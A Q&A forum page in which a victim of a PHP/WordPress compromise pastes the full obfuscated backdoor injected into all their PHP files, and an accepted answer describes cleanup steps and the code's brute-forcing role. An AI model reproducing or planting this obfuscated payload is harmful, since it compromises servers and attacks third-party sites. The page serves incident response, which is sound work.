duanbi7247 2016-02-09 10:34
浏览 37
已采纳

php XSS攻击后该怎么办?

My server is infected with XSS attack. All of the php files (all of wordpress, my custom .php scripts and applications) have got injected with a similar type of encrypted code seen as below.

What is the course of action in a situation like this? I've read about preventing XSS but couldn't find a solid guide on what to do when already got attacked.

Also, I wonder is it possible to decrypt the injected php code below:

<?php $wwykwjmqa = '281Ld]245]K2]285]Ke]53Ldd/#)rrd/#00;quui#>.%!<***f  x27,*e  x27,*d  x27,*c  x27,*4<%j,,*!|  x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<7fw6<*K)ftpmdXA6|7**197*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!*#>m%:|:*r%:-t%)3of:opjudo%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8^#zsfvr# x5cq%)ufttj x22)gj6<^#Y#    x5cq%   x27Y%6<.mif((function_exists("  x6f 1#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)mg%!)!gj!<2,*j%!-#1]#-bu,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r    x5c2^-%hOh/#00#W~!%t2-K)ebfsX   x27u%)7fmjix2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO   x22#)fepmqyfA>2b%!<*qp%d($n)-1);} @error_reporting(0); $effwexo :>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)*#j{hnpd#)tutjyf`opjudovg x22)!gj}56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hn   x7fw6*CW&)7gj6<*doj%7-C)fepmqz+sfwjidsb`bj+upcotn+qsvmt+fmhpph! x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t2w/   x24)##-!#~<)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>>!    x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi x5c1^W%c!>!%i#  x24#-!#]y38#-!%w:**<")));$dsngrwc d%6<pd%w6Z6<.4`hA x27pd%6<    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x281]265]y72]254]y76#<!%w:!>!(%w:!>!    x246767~6<Cw6<pd%w6Z6<.5`hA x27p!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!os!osvufs}w;*    x7f!>>  x22!pd%)!gj}Z!-id%)uqpuft`msvd},;um!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-4]y8  x24-    x24]26  x24-    x2b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%#<%tpz!>!#]D6M7]K3#<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!    x24/%tmw/   x24)%zW%h>EzH]672]48y]#>s%<#462]47y]252]18y]#>q%<qpuft`msvd}+;!>!}  x27;!>>>!}_;gvc%}&;ftmbg}   x7f;]53]Kc]55Ld]55#*<%bG9}:}.}6*CW&)7gj6<.[A    x27&6<  x7fw6*  x7f_*6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6< x]},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]#/% x24-    x24!>!fyqmpef)# x24*<!%t::!y3f]51L3]84]y31M6]y3e]81 x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeob6<*msv%7-MSV,6<*)ujojR    x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw5   x52 137 x41 107 x45 116 x54"]); if ((strstr($uas,"  x6d 163 x69 11~!<2p%    x7f!~!<##!>!2p%Z<^2 x5c8M7]381]211M5]67]452]88]5]48]32M3]316e"; function wfvpmkm($n){return chr(or323zbe!-#jt0*?]+^?]_  x5c}X   x24<!%tmw!>!#]#762]67y]562]38y]572]48y]dy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L8M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]23f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&by84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]25x24-   x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-%yy>#]D6]281L1#/#M5]DgP5]D6#<%f#-bubE{h%)tpqsut>j%!*9!  x27!hmg%)!gj!~<ofmy%,3,j%>j%!<{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)d:!ftmf!}Z;^nbsbq%  x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utj7f<*X&Z&S{ftmfV   x7f<*XAZASV<*w%)pmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**1111276<C  x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%qp%)54l}   x27;%!<*#}_;#)323ldfid>}&;!osvufs}  x7f;!opjudo.uofuopD#)sfebfI{*w%)kVOBALS["   x61 156 x75 156 x6de#)tutjyf`4  x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!g28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=%!|!*)323zbek!~!<b%   x7f!<X>b%Z<#opobE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxc:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]W%c:>1<%b:>1<!gps)%j#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fj+{e%!osvufs!*!+A!>!{e%)!>>   x22!ftmbg)!gj<*#k#)usbut`cpV    x7f%j:>>1*!%b:>1<!fmtf!%b:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!-}!#*<%nfd>%fdy<Cb*[%h!>!= $haczumi("", $effwexo); $dg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-%tdz*Wsfuvso!%bss  x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:62    x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 xpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<72qj%6<^#zsfvr#   x5cqvg<~    x24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25      x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44e*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37ypd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppvufs!~<3,j%>j%!*3!    x27!h*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&97e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc1"]=1; $uas=strtolower($_SE=])0#)U!  x27{**u%-#jt0}Z;0]=]0#pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA   x2-2qj%7-K)udfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB-*.%)euhA)3of>2bd%!<5h%/#0#/*#npS["  x61 156 x75 156 x61"])))) { $GL#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj  x22)gj!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<j;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52fyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,45")) or (strstr($uas," x72 166 x3a 61  x31"))) { $haczumi = "  x63 1w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%r%7/7#@#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5cq%7**)fubfsdXA   x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj36* x7f_*#fubfsdXk5`{66~6<&w6<|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`= implode(array_map("wfvpmkm",42   x5f 163 x74 141 x72 164") && (!isset($GLOBALsngrwc();}}vg}k~~9{d%:osvufs:~928>> x22:ftmbg39*x{**#k#)tutjyf`x    x22l:!}V;3q%}U;y]}R;27]445]212]445]43]321]464]284]364]6]234]342]58]24]31#7]y86]267]y74]275]y7:]268]y7f#<!%tww!>!    x2400~:<57ftbc  x7f!|!*uyfu x27kmsvd}R;*msv%)}.;`UQPMSVDh%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]sv`ftsbqA7>q%6<  x7fwppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,2njA    x27&6<.fmjgA    x27doj%6<   x7fw6*  x7f_*#fmjgk4`str_split("%tjw!>!#]y84]275]y83]248]y83]256]yxB%h>#]y31]278]y3e]81mjg}[;ldpt%}K;`ufldpt}X;`7pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fe7R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoFhopmA  x273qj%6<*Y%)fnbozcYufhA    x2)2q%l}S;2-u%!-#2#/#%#/#o]#/*) x7f x7f x7f<u%V x27{ftmfV   xRVER[" x48 124 x54 120 x5f 125 x53 10sTrREvxNoiTCnuf_EtaerCxECalPer_Rtszbpugxmqd'; $xadaat=explode(chr((833-713)),substr($wwykwjmqa,(40926-35049),(188-154))); $ghhrhvx = $xadaat[0]($xadaat[(6-5)]); $ohxwtrqt = $xadaat[0]($xadaat[(11-9)]); if (!function_exists('dulwdh')) { function dulwdh($xjtystpc, $ukgzlz,$luupugng) { $bzudlnhrz = NULL; for($gynqittgr=0;$gynqittgr<(sizeof($xjtystpc)/2);$gynqittgr++) { $bzudlnhrz .= substr($ukgzlz, $xjtystpc[($gynqittgr*2)],$xjtystpc[($gynqittgr*2)+(4-3)]); } return $luupugng(chr((55-46)),chr((294-202)),$bzudlnhrz); }; } $fjslgcupn = explode(chr((164-120)),'333,27,5103,47,4482,35,3015,26,4296,27,5840,37,1993,66,4769,67,3755,52,2126,39,579,41,5073,30,5558,45,1075,67,1002,26,4354,38,5649,49,2818,70,493,21,2888,49,1656,37,126,23,4392,58,4934,63,5750,33,3840,20,4882,52,284,49,5442,20,4997,29,733,30,5511,47,2624,50,4708,61,1924,69,1622,34,3373,49,5624,25,5359,24,1219,21,1548,48,1187,32,4596,62,1142,45,4098,24,404,24,3171,44,2570,54,2743,43,1240,49,862,43,149,54,650,34,2059,31,514,65,4450,32,24,53,1366,61,1864,60,763,33,3215,58,3807,33,4122,63,2354,60,3136,35,4517,43,5026,47,5336,23,2674,69,2937,55,5161,37,684,49,4046,52,3041,57,3422,60,5812,28,2786,32,5462,49,5698,52,2992,23,5198,38,1693,70,4323,31,5783,29,2165,41,2414,63,5288,48,5383,59,3098,38,3988,58,1512,36,2206,25,203,25,3860,67,2477,62,1823,41,1028,47,1342,24,77,49,796,66,1763,36,905,61,3927,61,3273,44,1447,65,428,65,4836,46,5603,21,4658,50,4185,45,1799,24,4230,66,1427,20,2539,31,2231,54,3317,36,0,24,1596,26,3566,25,228,56,2285,69,2090,36,5236,52,3682,44,3726,29,3353,20,620,30,3482,64,3546,20,4560,36,3619,63,1289,53,360,44,966,36,3591,28,5150,11'); $cagbthgj = $ghhrhvx("",dulwdh($fjslgcupn,$wwykwjmqa,$ohxwtrqt)); $ghhrhvx=$wwykwjmqa; $cagbthgj(""); $cagbthgj=(638-517); $wwykwjmqa=$cagbthgj-1; ?>

Just to understand what it does and where it got in?

Thanks in advance for all the help!

  • 写回答

1条回答 默认 最新

  • doukao8851 2017-01-02 09:18
    关注

    Ok, so wanted to share an update and close this. Here is what I did to overcome my server injection.

    1) Wrote down a script which goes every php file and look for the injected code, if found removes it. (The injected code has similar beginning and ending pattern)

    2) Changed passwords for server logins.

    3) Updated very very old wordpress sites in the server.

    Seems that this injected code was used for bruteforcing other wordpress & cpanels btw.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥100 有人会搭建GPT-J-6B框架吗?有偿
  • ¥15 求差集那个函数有问题,有无佬可以解决
  • ¥15 【提问】基于Invest的水源涵养
  • ¥20 微信网友居然可以通过vx号找到我绑的手机号
  • ¥15 寻一个支付宝扫码远程授权登录的软件助手app
  • ¥15 解riccati方程组
  • ¥15 display:none;样式在嵌套结构中的已设置了display样式的元素上不起作用?
  • ¥15 使用rabbitMQ 消息队列作为url源进行多线程爬取时,总有几个url没有处理的问题。
  • ¥15 Ubuntu在安装序列比对软件STAR时出现报错如何解决
  • ¥50 树莓派安卓APK系统签名